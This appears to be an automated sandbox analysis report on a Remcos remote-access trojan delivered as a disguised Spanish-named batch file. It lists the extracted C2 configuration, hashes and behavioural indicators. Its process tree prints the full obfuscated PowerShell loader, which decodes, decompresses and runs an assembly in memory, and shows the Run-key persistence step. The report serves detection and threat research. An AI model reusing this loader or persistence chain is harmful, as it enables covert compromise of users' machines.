Analysis
-
max time kernel
300s -
max time network
300s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
03-10-2024 04:39
Static task
static1
Behavioral task
behavioral1
Sample
Cobro_876634226701191038128011582367096095686646340584195296708193218.bat
Resource
win7-20240903-en
General
-
Target
Cobro_876634226701191038128011582367096095686646340584195296708193218.bat
-
Size
1.8MB
-
MD5
1698e898da21c028d3bfc61cbf0904aa
-
SHA1
acd1043cec76eacee19eb78b37b4a0624bc350f3
-
SHA256
075e65d20779e5ffdbe58f96c3639d6a6db830c41e100e68e0d45361ee2cc099
-
SHA512
466baec151eb73eeebe4b92a15b0046035019d19da9a7236d5d5e409ed61dd95469aed729eeb37eaab0bf905d5360bffd0b83975c3f5709888e10dd4ff401f61
-
SSDEEP
24576:Gyc27ntMASfw1Tr0s3OoF3A+HcA0uuSpYFIgu9k/gnJyi2QvqxspBVskiXLf5:dtwQYs+M3N8A0ud79yS92QvqNt
Malware Config
Extracted
remcos
VIVERO2
viveroelgirasol.com:2406
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
lgs.dat
-
keylog_flag
false
-
keylog_folder
WinLog
-
mouse_option
false
-
mutex
qwerty2024-GHME8E
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4844 created 3524 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow 56 -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2416 attrib.exe -
Executes dropped EXE 1 IoCs
pid Process 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nghhytzqlf = "C:\\Users\\Admin\\AppData\\Roaming\\Nghhytzqlf.bat" Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4844 set thread context of 1372 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow 88 -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow Token: SeDebugPrivilege 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1372 InstallUtil.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 2188 wrote to memory of 4440 2188 cmd.exe 83 PID 2188 wrote to memory of 4440 2188 cmd.exe 83 PID 2188 wrote to memory of 3228 2188 cmd.exe 84 PID 2188 wrote to memory of 3228 2188 cmd.exe 84 PID 2188 wrote to memory of 3440 2188 cmd.exe 85 PID 2188 wrote to memory of 3440 2188 cmd.exe 85 PID 2188 wrote to memory of 2416 2188 cmd.exe 86 PID 2188 wrote to memory of 2416 2188 cmd.exe 86 PID 2188 wrote to memory of 4844 2188 cmd.exe 87 PID 2188 wrote to memory of 4844 2188 cmd.exe 87 PID 2188 wrote to memory of 4844 2188 cmd.exe 87 PID 4844 wrote to memory of 1372 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow 88 PID 4844 wrote to memory of 1372 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow 88 PID 4844 wrote to memory of 1372 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow 88 PID 4844 wrote to memory of 1372 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow 88 PID 4844 wrote to memory of 1372 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow 88 PID 4844 wrote to memory of 1372 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow 88 PID 4844 wrote to memory of 1372 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow 88 PID 4844 wrote to memory of 1372 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow 88 PID 4844 wrote to memory of 1372 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow 88 PID 4844 wrote to memory of 1372 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow 88 PID 4844 wrote to memory of 1372 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow 88 PID 4844 wrote to memory of 1372 4844 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow 88 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2416 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3524
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:4440
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:3228
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow3⤵PID:3440
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2416
-
-
C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.JowC:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow -WindowStyle hidden -command "$Amwfvap = get-content 'C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat' | Select-Object -Last 1; $Lahapqm = [System.Convert]::FromBase64String($Amwfvap);$Wmhuprvc = New-Object System.IO.MemoryStream( , $Lahapqm );$Swwilmyw = New-Object System.IO.MemoryStream;$Haozxiw = New-Object System.IO.Compression.GzipStream $Wmhuprvc, ([IO.Compression.CompressionMode]::Decompress);$Haozxiw.CopyTo( $Swwilmyw );$Haozxiw.Close();$Wmhuprvc.Close();[byte[]] $Lahapqm = $Swwilmyw.ToArray();[Array]::Reverse($Lahapqm); $Uzzzux = [System.AppDomain]::CurrentDomain.Load($Lahapqm); $Xtqfmtdiwhr = $Uzzzux.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Xtqfmtdiwhr.DeclaringType, $Xtqfmtdiwhr.Name).DynamicInvoke() | Out-Null"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4844
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1372
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5851b3a63b0d1ea3c90b473387be6d3bf
SHA15c9a0690eade6ea8ee7a278f822b84122a1bbafa
SHA25643bf4cb6e883c7ba7714c03afa73bdba1f988d5895453f5c22693e3f2788eb56
SHA5120b8886e2943bca707a0ef8866232e0fd83ccdb21d423283e801af09cdfbf7a02ce6ed2d638457856ecb4e33349c11247c33888a4e1cbff683e1e22187aa72c5c
-
C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow
Filesize423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82